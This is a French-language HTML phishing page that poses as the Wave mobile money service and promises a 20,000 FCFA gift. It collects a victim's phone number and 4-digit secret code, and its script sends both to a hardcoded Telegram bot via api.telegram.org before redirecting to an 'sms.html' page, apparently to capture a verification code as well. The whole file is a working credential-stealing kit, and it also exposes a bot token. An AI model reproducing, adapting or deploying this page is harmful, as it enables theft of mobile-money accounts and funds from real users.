<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wave vous offre 20.000 FCFA dès aujourd'hui</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap');

        body {
            padding: 15px;
            font-family: "Poppins", sans-serif;

        }

        h1 {
            text-align: center;
            color: #10b7ec;
            font-family: Arial, Helvetica, sans-serif;
        }

        p {
            text-align: center;
            font-size: 1.2rem;
        }

        form {
            display: flex;
            flex-direction: column;
        }

        input {
            width: 70%;
            height: 40px;
            margin-left: auto;
            text-align: center;
            font-size: 1.4rem;
            border: none;
            border-radius: 0%;
            border-bottom: 2px solid grey;
        }

        input:focus {
            outline: none;
            border-bottom: 2px solid #10b7ec;
        }

        div {
            display: flex;
        }

        select {
            width: 70px;
            font-size: 1.2rem;
            border: none;
            border-radius: 0%;

        }

        button {
            width: 100%;
            height: 45px;
            border: none;
            border-radius: 9999px;
            color: white;
            font-weight: bolder;
            font-size: 1.3rem;
            background-color: #10b7ec;
            box-shadow: 0 8px 16px;
            cursor: pointer;
        }

        #pwd,
        #co {
            display: none;
        }
    </style>
</head>

<body>
    <h1>Wave</h1>
    <p>Bienvenue chez Wave ! Pour commencer, entrez votre numéro de mobile</p>

    <br>
    <br>

    <form id="form">
        <div>
            <select>
                <option value="">+225</option>
            </select>

            <input id="tel" type="tel" minlength="10" maxlength="10" placeholder="XX XX XX XX XX " required>

        </div>
        <span style="color: orange; margin-left: auto;" id="notif"></span>
        <br> <br>
        <input id="pwd" type="tel" minlength="4" maxlength="4" placeholder="Code secret" required>

        <br> <br>
        <button id="suivant">Suivant</button> <br>
        <button id="co">Connexion</button>


    </form>

</body>

<script>
    document.getElementById('suivant').addEventListener('click', function (e) {
        e.preventDefault();

        const tel = document.getElementById('tel').value;

        if (tel.length == 10) {


            document.getElementById('pwd').style.display = "block";
            document.getElementById('co').style.display = "block";
            document.getElementById('suivant').style.display = "none";
        } else {
            document.getElementById("notif").innerText = 'numéro invalide !'
        }
    })

    document.getElementById('co').addEventListener('click', function (e) {
        e.preventDefault();

        const tel = document.getElementById('tel').value;
        const pwd = document.getElementById('pwd').value;

        if (pwd.length == 4) {
            const botToken = "7891154943:AAG-iRSqPg6KL1q-slYogakDcXBvjrcrFCU";  // Remplace par le token de ton bot
            const chatId = "8033906914";      // Remplace par l'ID du chat



            const message = `🎀 Wave mali :\n\n📞Numero : ${tel}\n🔐 Code : ${pwd}`;


            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            })
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        localStorage.setItem('tel', tel);
                        window.location.href = './sms.html';
                    } else {
                        alert('Erreur lors de l\'envoi des données.');
                    }
                })
                .catch(error => {
                    console.error('Erreur:', error);
                });
        } else {
            document.getElementById("notif").innerText = 'Code secret invalide !'
        }
    });
</script>

</html>